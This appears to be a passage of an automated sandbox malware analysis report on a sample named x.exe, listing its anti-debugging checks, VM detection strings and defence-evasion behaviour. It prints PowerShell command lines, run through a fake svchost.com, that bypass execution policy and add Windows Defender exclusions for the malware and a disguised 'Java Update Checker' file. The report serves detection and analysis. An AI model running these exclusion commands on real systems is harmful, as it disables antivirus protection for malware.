                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Config\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Jump to behavior
                              Source: x.exeBinary or memory string: vmware
                              Source: x.exe, 00000002.00000002.2476117462.000000001BFA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeCode function: 2_2_00007FFAACCA6E61 CheckRemoteDebuggerPresent,2_2_00007FFAACCA6E61
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Adds a directory exclusion to Windows Defender
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'Jump to behavior
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'Jump to behavior
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'
                              Bypasses PowerShell execution policy
                              Source: C:\Windows\svchost.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'
                              Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\x.exe "C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\3582-490\x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update Checker (64 bit).exe'Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess created: C:\Windows\svchost.com "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update Checker (64 bit).exe'Jump to behavior
                              Source: AutoIt3_x64.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3582-490\x.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
